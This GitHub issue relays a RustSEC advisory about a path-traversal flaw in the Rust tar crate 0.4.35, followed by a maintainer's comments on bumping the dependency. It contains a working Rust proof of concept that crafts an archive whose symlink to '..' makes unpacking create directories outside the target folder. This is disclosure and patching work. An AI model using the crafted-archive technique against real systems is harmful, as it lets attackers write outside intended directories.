RUSTSEC-2021-0080: Links in archive can create arbitrary directories

[github-actions]

Links in archive can create arbitrary directories

Details
Package	tar
Version	0.4.35
URL	alexcrichton/tar-rs#238
Date	2021-07-19

When unpacking a tarball that contains a symlink the tar crate may create
directories outside of the directory it's supposed to unpack into.

The function errors when it's trying to create a file, but the folders are
already created at this point.

use std::{io, io::Result};
use tar::{Archive, Builder, EntryType, Header};

fn main() -> Result<()> {
    let mut buf = Vec::new();

    {
        let mut builder = Builder::new(&mut buf);

        // symlink: parent -> ..
        let mut header = Header::new_gnu();
        header.set_path("symlink")?;
        header.set_link_name("..")?;
        header.set_entry_type(EntryType::Symlink);
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        // file: symlink/exploit/foo/bar
        let mut header = Header::new_gnu();
        header.set_path("symlink/exploit/foo/bar")?;
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        builder.finish()?;
    };

    Archive::new(&*buf).unpack("demo")
}

This issue was discovered and reported by Martin Michaelis (@mgjm).

See advisory page for additional details.

[pinkforest]

I've bumped the tar in cargo upstream that ensures minimum tar is 0.4.36 that has addressed this properly.

When ever there is new crate release we can bump our dep to properly enforce minimum -

Even by using the current cargo version 0.52.0 the tar that gets dep'ed in .lock is 0.4.38.

I'm working on patch that solves another advisory as part of the cargo bump which has some interface changes.

@tarcieri can you assign this to me pls.

[pinkforest]

I'll close this since Cargo.lock now meets tar 0.4.38

[[package]]
name = "tar"
version = "0.4.38"
source = "registry+https://github.com/rust-lang/crates.io-index"